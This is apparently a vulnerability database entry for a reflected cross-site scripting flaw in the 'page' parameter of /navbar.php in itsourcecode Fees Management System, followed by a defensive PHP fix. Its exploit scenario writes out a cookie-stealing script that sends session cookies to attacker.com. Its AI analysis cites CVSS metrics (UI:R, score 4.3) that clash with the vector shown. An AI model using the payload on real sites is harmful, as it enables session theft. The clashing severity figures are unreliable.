Severity by source
CVSS vector (NVD): CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
Description (CVE.org)
A weakness has been identified in itsourcecode Fees Management System up to 1.0. Affected is an unknown function of the file /navbar.php. This manipulation of the argument page causes cross-site scripting. The attack can be carried out remotely. The exploit has been made available to the public and could be used for attacks.
Analysis (AI)
Reflected cross-site scripting in itsourcecode Fees Management System 1.0 allows remote unauthenticated attackers to inject arbitrary JavaScript into a victim's browser session by manipulating the 'page' parameter in /navbar.php. The attack requires user interaction - a victim must follow a crafted URL - limiting mass exploitation, but publicly available exploit code (referenced via a GitHub issue) lowers the barrier for targeted phishing campaigns. …
Attack Chain (AI-derived): hypothetical attack flow derived from CVE metadata
Vulnerability Assessment (AI)
| Aspect | Assessment |
| --- | --- |
| Exploitation | The victim must be induced to click a specially crafted URL - exploitation is not possible without this user interaction (UI:R in CVSS vector), which limits automated or worm-style attacks. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS base score of 4.3 (Medium) reflects a network-accessible (AV:N), low-complexity (AC:L), unauthenticated (PR:N) attack that nonetheless requires user interaction (UI:R) and has limited impact (I:L integrity only, S:U scope unchanged, no confidentiality or availability impact). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker identifies a school or institution running the itsourcecode Fees Management System publicly, crafts a URL embedding a JavaScript payload in the 'page' parameter targeting /navbar.php (e.g., /navbar.php?page=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>), and delivers this link to a logged-in administrator or staff member via phishing email. When the victim clicks the link and their browser renders the unencoded parameter, the injected script executes in the context of the application's origin. … |
| Remediation | No vendor-released patch has been identified at time of analysis; the CVSS remediation level RL:X (Not Defined) corroborates the absence of an official fix. … Detailed patch versions, workarounds, and compensating controls in full report. |
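Since no vendor fix is identified, the practical mitigation is a source-level one in /navbar.php. The following is an added example, not code from the itsourcecode project or from this page: the real navbar.php is not shown here, so the vulnerable function reconstructs only the pattern the analysis describes (the 'page' query value written into the HTML unencoded) as an assumption, and the navigation entry names in the allowlist are constructed. The hardened version combines an allowlist (the parameter selects a navigation entry, so only known names are meaningful) with context-correct output encoding via htmlspecialchars, which is the generic fix for a reflected parameter of this kind.

```php
<?php
// Added example (assumption: navbar.php echoes $_GET['page'] unencoded).
// Not the itsourcecode project's own code.

// Vulnerable pattern: the raw query value lands inside an attribute and
// inside text content. A value that closes the quote and attribute can
// then inject markup that runs in the application's origin.
function render_navbar_vulnerable(string $page): string
{
    return '<a class="active" href="?page=' . $page . '">' . $page . '</a>';
}

// Constructed navigation names for the allowlist; the real entry names
// of the Fees Management System are not on this page.
const ALLOWED_PAGES = ['dashboard', 'students', 'fees', 'reports'];

// Layer 1: allowlist. Anything not in the list collapses to a safe default,
// so attacker-controlled text never reaches the template at all.
function select_page(?string $requested): string
{
    return in_array($requested, ALLOWED_PAGES, true) ? $requested : 'dashboard';
}

// Layer 2: output encoding. ENT_QUOTES escapes both quote styles, which
// covers the double-quoted attribute context as well as the text context;
// ENT_SUBSTITUTE keeps malformed UTF-8 from silently emptying the output.
function render_navbar_safe(string $page): string
{
    $safe = htmlspecialchars($page, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a class="active" href="?page=' . $safe . '">' . $safe . '</a>';
}

// Demonstration with a constructed probe value (a harmless test string, no target).
$probe = '"><script>alert(1)</script>';

echo render_navbar_vulnerable($probe), PHP_EOL;
// The <script> element survives intact inside the anchor markup.

echo render_navbar_safe(select_page($probe)), PHP_EOL;
// Allowlist rejects the probe: renders the 'dashboard' entry.

echo render_navbar_safe($probe), PHP_EOL;
// Encoding alone: &quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt; is shown as text.

// In the real handler the two layers compose as:
//   $page = select_page($_GET['page'] ?? null);
//   echo render_navbar_safe($page);
```

The allowlist is the stronger control because it removes the untrusted value entirely; the encoding remains worthwhile as defence in depth for any other place the same value is echoed, and it is the only layer that applies if the parameter legitimately needs to carry free text.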
References and related identifiers
- External POC / Exploit Code (external link)
- EUVD-2026-34261
- GHSA-gx9q-vg44-8c2c